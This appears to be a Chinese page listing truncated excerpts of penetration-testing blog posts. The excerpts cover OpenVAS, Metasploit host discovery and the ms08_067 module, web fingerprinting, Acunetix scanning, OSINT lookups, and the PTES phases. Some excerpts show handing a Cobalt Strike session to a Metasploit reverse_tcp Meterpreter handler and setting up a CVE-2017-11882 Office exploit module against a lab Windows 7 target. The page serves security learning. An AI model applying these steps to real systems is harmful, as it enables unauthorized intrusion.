由于新版的kali中没有预装OpenVAS.所以在虚拟机中安装花了非常多的时间. 安装过程参考:http://www.cnblogs.com/zlslch/p/6872559.html过程写的非常详细本文不再赘述.   稍微提示一下:如果使用openvas-check-setup命令检查出有错误但是又不知道如何去修正(恩,没错说的就是我自己^_^!)可以尝试再次使用openvas-setup命令安装一下看看,说不定就好了呢.   安装好后:      启动openvas      修改密码  …
msf > search ms08_067 Matching Modules ================    Name                                 Disclosure Date  Rank   Description    ----                                 ---------------  ----   -----------    exploit/windows/smb/ms08_067_netapi  20…
Web踩点 CMS程序版本探测 Blindelephant 针对WORDPRESS程序的踩点工具,通过比较插件等一系列的指纹,判断版本. 格式: Python Blindelephant.py [参数] url appname 表示很蛋疼,什么情况. Whatweb Web应用程序探测工具. 初次使用会提示在终端执行: Update-alternatives –config ruby 格式: ./whatweb [参数] <URLs> WAF防火墙探测 Waffit WAF防火墙检测工具,作用…
Acunetix网络漏洞扫描软件检测您网络的安全性安全测试工具Acunetix Web Vulnerability Scanner(WVS) (Acunetix网络漏洞扫描器)技术 网络应用安全扫描技术 对于Web应用黑客,防火墙,ssl及锁定服务器等方法是徒劳的.针对Web应用程序的攻击,是通过80端口 ,他们可以穿过防火墙,操作系统和网络级的安全防护设备,取得您的应用程序和企业的数据.量身定制的Web安全设备往往不够测试出一些还未发现的漏洞,因此容易成为黑客攻击目标.Acunetix -在全…
Awvs漏洞扫描自动化 在WEB安全方面,安全侧使用Acunetix_Web_Vulnerability_Scanner_11.xWEB漏洞扫描工具定期手工对m站和www站进行全站漏洞扫描. 为了防止WEB站点存在未知漏洞而未及时发现,将手工操作进行自动化,设置定时任务,让Awvs定时自动执行扫描任务,扫描完成后自动生成报告,自动下载Html格式报告并通过邮件通知相关人员.安全侧将重点关注邮件附件中漏洞级别为High的漏洞信息,并验证漏洞是否为误报,如非误报则需要跟进解决. Awvs扫描流程图…
概要: msf的arp_sweep .udp_sweep模块 Nmap -sn使用ping探测 -PU -sn 使用UDP协议端口探测 msf模块 arp_sweep     常用 ipv6_multicast_ping ipv6_neighbor ipv6_neighbor_router_advertisement udp_probe udp_sweep     常用 同时也会发现主机上的udp服务 msf > use auxiliary/scanner/discovery/arp_sweep…
情报搜集环境站渗透测试全过程的80%~90%   一.外围信息搜集(公开渠道信息搜集OSINT  open source intelligence) 3.1.1信息收集-通过DNS和IP地址挖掘目标网络信息 1.whois域名注册信息查询 whois查询时去掉www.ftp等前缀   2.nslookup与dig域名查询 nslookup与dig的区别 nslookup只会得到DNS解析服务器报错在Cache中的非权威解答. dig工具可以从该域名的官方DNS服务器商查询到精确的权威答案.?尝试…
第一步 Cobalt strike 派生 shell 给 MSF(前提有个beacon shell) 第二步 选择要派生的beacon,右键-->增加会话,选择刚刚配置的foreign监听器 第三部 msf msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_t…
1.测试环境 2.测试前准备 3.测试过程 -3.1虚拟机环境测试 -3.2局域网靶机测试 4.测试感想 1.测试环境 攻击机: OS:kail IP:192.168.15.132/192.168.137.231 靶机: OS:Windows7 Office版本:Office2013_CN IP: 2.测试前准备 1.下载python脚本 2.下载MSF组件 3.将cve_2017_11882.rb复制到/usr/share/metasploit-framework/modules/exploi…
1.1.4渗透测试过程环节 PTES标准7个阶段 1.前期交互阶段      收集客户需求.准备测试计划.定义测试范围与边界.定义业务目标.项目管理与规划等 2.情报搜集阶段      公开来源信息查询.GoogleHacking.社会工程学.网络踩点.扫描探测.被动监听.服务查点等 3.威胁建模阶段      情报搜集完毕后,分析情报.头脑风暴分析可行的攻击通道. 4.漏洞分析阶段      通过前期的信息分析.找出可行的实时渗透攻击的攻击点,在实验环境中验证.高水平团队还会针对攻击通道中的关…